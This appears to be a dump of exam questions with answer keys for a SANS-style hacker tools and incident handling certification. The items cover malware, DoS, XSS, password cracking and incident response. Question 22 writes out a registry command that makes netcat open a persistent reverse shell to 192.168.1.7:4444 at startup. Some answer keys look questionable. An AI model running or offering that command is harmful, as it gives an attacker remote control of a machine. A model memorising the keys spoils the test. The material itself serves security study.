QUESTION 1
Adam, a novice computer user, works primarily from home as a medical professional. He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Adam uses antivirus software, anti-spyware software, and keeps the computer up-to-date with Microsoft patches. After another month of working on the computer, Adam finds that his computer is even more noticeably slow. He also notices a window or two pop up on his screen, but they quickly disappear. He has seen these windows show up even when he has not been on the Internet. Adam notices that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Adam thinks this is very odd. Which of the following is the most likely cause of the problem?
A. Computer is infected with the stealth kernel level rootkit.
B. Computer is infected with stealth virus.
C. Computer is infected with the Stealth Trojan Virus.
D. Computer is infected with the Self-Replication Worm.
Correct Answer: A
Section: (none)
Explanation/Reference:
QUESTION 2
Ryan, a malicious hacker, submits Cross-Site Scripting (XSS) exploit code to the Web site of an Internet forum for online discussion. When a user visits the infected Web page, the code gets automatically executed and Ryan can easily perform acts like account hijacking, history theft, etc. Which of the following types of Cross-Site Scripting attack does Ryan intend to perform?
A. Nonpersistent
B. Document Object Model (DOM)
C. SAX
D. Persistent
Correct Answer: D
Section: (none)
Explanation/Reference:
QUESTION 3
You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. An attacker uses software that keeps trying password combinations until the correct password is found. Which type of attack is this?
A. Denial-of-Service
B. Man-in-the-middle
C. Brute Force
D. Vulnerability
Correct Answer: C
Section: (none)
Explanation/Reference:
QUESTION 4
Many organizations create network maps of their network system to visualize the network and understand the relationship between the end devices and the transport layer that provides services.
Which of the following are the techniques used for network mapping by large organizations? Each correct answer represents a complete solution. Choose three.
A. Packet crafting
B. Route analytics
C. SNMP-based approaches
D. Active Probing
Correct Answer: BCD
Section: (none)
Explanation/Reference:
QUESTION 5
Which of the following functions can you use to mitigate a command injection attack? Each correct answer represents a part of the solution. Choose all that apply.
A. escapeshellarg()
B. escapeshellcmd()
C. htmlentities()
D. strip_tags()
Correct Answer: AB
Section: (none)
Explanation/Reference:
QUESTION 6
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a company's icon to mark the progress of the test. Adam successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access. How was security compromised and how did the firewall respond?
A. The attack was social engineering and the firewall did not detect it.
B. Security was not compromised as the webpage was hosted internally.
C. The attack was Cross Site Scripting and the firewall blocked it.
D. Security was compromised as keylogger is invisible for firewall.
Correct Answer: A
Section: (none)
Explanation/Reference:
QUESTION 7
Which of the following statements about a Trojan horse are true? Each correct answer represents a complete solution. Choose two.
A. It is a macro or script that attaches itself to a file or template.
B. The writers of a Trojan horse can use it later to gain unauthorized access to a computer.
C. It is a malicious software program code that resembles another normal program.
D. It infects the boot record on hard disks and floppy disks.
Correct Answer: BC
Section: (none)
Explanation/Reference:
QUESTION 8
In which of the following attack methods does an attacker distribute incorrect IP addresses?
A. IP spoofing
B. MAC flooding
C. DNS poisoning
D. Man-in-the-middle
Correct Answer: C
Section: (none)
Explanation/Reference:
QUESTION 9
Which of the following types of attacks is mounted with the objective of causing a negative impact on the performance of a computer or network?
A. Vulnerability attack
B. Man-in-the-middle attack
C. Denial-of-Service (DoS) attack
D. Impersonation attack
Correct Answer: C
Section: (none)
Explanation/Reference:
QUESTION 10
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He performs Web vulnerability scanning on the We-are-secure server. The output of the scanning test is as follows:
C:\whisker.pl -h target_IP_address
-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net --
= - = - = - = - =
= Host: target_IP_address
= Server: Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22
+ 200 OK: HEAD /cgi-bin/printenv
John recognizes the /cgi-bin/printenv vulnerability ('Printenv' vulnerability) in the We-are-secure server. Which of the following statements about the 'Printenv' vulnerability are true?
Each correct answer represents a complete solution. Choose all that apply.
A. This vulnerability helps in a cross site scripting attack.
B. 'Printenv' vulnerability maintains a log file of user activities on the Web site, which may be useful for the attacker.
C. The countermeasure to 'printenv' vulnerability is to remove the CGI script.
D. With the help of 'printenv' vulnerability, an attacker can input specially crafted links and/or other malicious scripts.
Correct Answer: ACD
Section: (none)
Explanation/Reference:
QUESTION 11
Which of the following tools can be used for steganography? Each correct answer represents a complete solution. Choose all that apply.
A. Imagehide
B. Stegbreak
C. Snow.exe
D. Anti-x
Correct Answer: AC
Section: (none)
Explanation/Reference:
QUESTION 12
Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases?
A. Fragroute
B. Absinthe
C. Stick
D. ADMutate
Correct Answer: B
Section: (none)
Explanation/Reference:
QUESTION 13
Which of the following attacks come under the category of layer 2 Denial-of-Service attacks? Each correct answer represents a complete solution. Choose all that apply.
A. Spoofing attack
B. SYN flood attack
C. Password cracking
D. RF jamming attack
Correct Answer: AB
Section: (none)
Explanation/Reference:
QUESTION 14
Which of the following tools can be used to perform brute force attack on a remote database? Each correct answer represents a complete solution. Choose all that apply.
A. SQLBF
B. SQLDict
C. FindSA
D. nmap
Correct Answer: ABC
Section: (none)
Explanation/Reference:
QUESTION 15
Which of the following are the primary goals of the incident handling team? Each correct answer represents a complete solution. Choose all that apply.
A. Freeze the scene.
B. Repair any damage caused by an incident.
C. Prevent any further damage.
D. Inform higher authorities.
Correct Answer: ABC
Section: (none)
Explanation/Reference:
QUESTION 16
You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows Server 2003 and Windows Active Directory installation and placement. Which of the following steps are you using to perform hacking?
A. Scanning
B. Covering tracks
C. Reconnaissance
D. Gaining access
Correct Answer: C
Section: (none)
Explanation/Reference:
QUESTION 17
You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 Active Directory-based single domain single forest network. The company has three Windows 2008 file servers, 150 Windows XP Professional client computers, and thirty UNIX-based client computers. The network users have identical user accounts for both Active Directory and the UNIX realm. You want to ensure that the UNIX clients on the network can access the file servers. You also want to ensure that the users are able to access all resources by logging on only once, and that no additional software is installed on the UNIX clients. What will you do to accomplish this task?
Each correct answer represents a part of the solution. Choose two.
A. Configure a distributed file system (Dfs) on the file server in the network.
B. Enable the Network File System (NFS) component on the file servers in the network.
C. Configure ADRMS on the file servers in the network.
D. Enable User Name Mapping on the file servers in the network.
Correct Answer: BD
Section: (none)
Explanation/Reference:
QUESTION 18
You work as a Network Administrator for InformSec Inc. You find that the TCP port number 23476 is open on your server. You suspect that there may be a Trojan named Donald Dick installed on your server. Now you want to verify whether Donald Dick is installed on it or not. For this, you want to know the process running on port 23476, as well as the process id, process name, and the path of the process on your server. Which of the following applications will you most likely use to accomplish the task?
A. Tripwire
B. SubSeven
C. Netstat
D. Fport
Correct Answer: D
Section: (none)
Explanation/Reference:
QUESTION 19
Maria works as a professional Ethical Hacker. She is assigned a project to test the security of www.we-are-secure.com. She wants to test a DoS attack on the We-are-secure server. She finds that the firewall of the server is blocking the ICMP messages, but it is not checking the UDP packets. Therefore, she sends a large amount of UDP echo request traffic to the IP broadcast addresses. These UDP requests have a spoofed source address of the We-are-secure server. Which of the following DoS attacks is Maria using to accomplish her task?
A. Ping flood attack
B. Fraggle DoS attack
C. Teardrop attack
D. Smurf DoS attack
Correct Answer: B
Section: (none)
Explanation/Reference:
QUESTION 20
Your company has been hired to provide consultancy, development, and integration services for a company named Brainbridge International. You have prepared a case study to plan the upgrade for the company. Based on the case study, which of the following steps will you suggest for configuring WebStore1?
Each correct answer represents a part of the solution. Choose two.
A. Customize IIS 6.0 to display a legal warning page on the generation of the 404.2 and 404.3 errors.
B. Move the WebStore1 server to the internal network.
C. Configure IIS 6.0 on WebStore1 to scan the URL for known buffer overflow attacks.
D. Move the computer account of WebStore1 to the Remote organizational unit (OU).
Correct Answer: AC
Section: (none)
Explanation/Reference:
QUESTION 21
Which of the following attacks is specially used for cracking a password?
A. PING attack
B. Dictionary attack
C. Vulnerability attack
D. DoS attack
Correct Answer: B
Section: (none)
Explanation/Reference:
QUESTION 22
You run the following command on the remote Windows Server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.
A. You want to perform banner grabbing.
B. You want to set Netcat to execute commands at any time.
C. You want to put Netcat in the stealth mode.
D. You want to add the Netcat command to the Windows registry.
Correct Answer: BCD
Section: (none)
Explanation/Reference:
QUESTION 23
Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?
A. Rainbow attack
B. Brute Force attack
C. Dictionary attack
D. Hybrid attack
Correct Answer: A
Section: (none)
Explanation/Reference:
QUESTION 24
Which of the following tools is used to download the Web pages of a Website on the local system?
A. wget
B. jplag
C. Nessus
D. Ettercap
Correct Answer: A
Section: (none)
Explanation/Reference:
QUESTION 25
Which of the following is a network worm that exploits the RPC sub-system vulnerability present in the Microsoft Windows operating system?
A. Win32/Agent
B. WMA/TrojanDownloader.GetCodec
C. Win32/Conflicker
D. Win32/PSW.OnLineGames
Correct Answer: C
Section: (none)
Explanation/Reference:
QUESTION 26
Which of the following applications is an example of a data-sending Trojan?
A. SubSeven
B. Senna Spy Generator
C. Firekiller 2000
D. eBlaster
Correct Answer: D
Section: (none)
Explanation/Reference:
QUESTION 27
Adam works as an Incident Handler for Umbrella Inc. He has been sent to the California unit to train the members of the incident response team. As a demo project he asked members of the incident response team to perform the following actions:
Remove the network cable wires.
Isolate the system on a separate VLAN.
Use a firewall or access lists to prevent communication into or out of the system.
Change DNS entries to direct traffic away from the compromised system.
Which of the following steps of the incident handling process includes the above actions?
A. Identification
B. Containment
C. Eradication
D. Recovery
Correct Answer: B
Section: (none)
Explanation/Reference:
QUESTION 28
Which of the following statements are true about worms?
Each correct answer represents a complete solution. Choose all that apply.
A. Worms cause harm to the network by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
B. Worms can exist inside files such as Word or Excel documents.
C. One feature of worms is keystroke logging.
D. Worms replicate themselves from one system to another without using a host file.
Correct Answer: ABD
Section: (none)
Explanation/Reference:
QUESTION 29
Which of the following commands is used to access Windows resources from a Linux workstation?
A. mutt
B. scp
C. rsync
D. smbclient
Correct Answer: D
Section: (none)
Explanation/Reference:
QUESTION 30
Your network is being flooded by ICMP packets. When you trace them, they come from multiple different IP addresses. What kind of attack is this?
A. Syn flood
B. Ping storm
C. Smurf attack
D. DDOS
Correct Answer: D
Section: (none)
Explanation/Reference:
QUESTION 31
In which of the following DoS attacks does an attacker send an ICMP packet larger than 65,536 bytes to the target system?
A. Ping of death
B. Jolt
C. Fraggle
D. Teardrop
Correct Answer: A
Section: (none)
Explanation/Reference:
QUESTION 32
Which of the following tools combines two programs, and also encrypts the resulting package in an attempt to foil antivirus programs?
A. Trojan Man
B. EliteWrap
C. Tiny
D. NetBus
Correct Answer: A
Section: (none)
Explanation/Reference:
QUESTION 33
What is the major difference between a worm and a Trojan horse?
A. A worm spreads via e-mail, while a Trojan horse does not.
B. A worm is a form of malicious program, while a Trojan horse is a utility.
C. A worm is self replicating, while a Trojan horse is not.
D. A Trojan horse is a malicious program, while a worm is an anti-virus software.
Correct Answer: C
Section: (none)
Explanation/Reference:
QUESTION 34
Which of the following statements are true about firewalking?
Each correct answer represents a complete solution. Choose all that apply.
A. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall.
B. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall.
C. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall.
D. Firewalking works on the UDP packets.
Correct Answer: ABC
Section: (none)
Explanation/Reference:
QUESTION 35
Which of the following statements are true about a keylogger?
Each correct answer represents a complete solution. Choose all that apply.
A. It records all keystrokes on the victim's computer in a predefined log file.
B. It can be remotely installed on a computer system.
C. It is a software tool used to trace all or specific activities of a user on a computer.
D. It uses hidden code to destroy or scramble data on the hard disk.
Correct Answer: ABC
Section: (none)
Explanation/Reference:
QUESTION 36
You have configured a virtualized Internet browser on your Windows XP professional computer. Using the virtualized Internet browser, you can protect your operating system from which of the following?
A. Brute force attack
B. Mail bombing
C. Distributed denial of service (DDOS) attack
D. Malware installation from unknown Web sites
Correct Answer: D
Section: (none)
Explanation/Reference:
QUESTION 37
Adam works as a Network Administrator for Examkiller Inc. He wants to protect the network from DoS attacks. Which of the following is most useful against DoS attacks?
A. SPI
B. Distributive firewall
C. HoneyPot
D. Internet bot
Correct Answer: A
Section: (none)
Explanation/Reference:
QUESTION 38
Which of the following is spy software that records activity on Macintosh systems via snapshots, keystrokes, and Web site logging?
A. Spector
B. Magic Lantern
C. eblaster
D. NetBus
Correct Answer: A
Section: (none)
Explanation/Reference:
QUESTION 39
You work as a Penetration Tester for Infosec Inc. Your company takes on security auditing projects. Recently, your company has assigned you a project to test the security of the we-are-secure.com Web site. For this, you want to perform an idle scan so that you can find the open ports on the we-are-secure.com server. You are using the Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that every IPID is being incremented on every query, regardless of whether the ports are open or closed. Sometimes, the IPID is being incremented by more than one value. What may be the reason?
A. The firewall is blocking the scanning process.
B. The zombie computer is not connected to the we-are-secure.com Web server.
C. The zombie computer is the system interacting with some other system besides your computer.
D. Hping does not perform idle scanning.
Correct Answer: C
Section: (none)
Explanation/Reference:
SANS Hacker Tools, Techniques, Exploits and Incident Handling Questions + Answers Part 1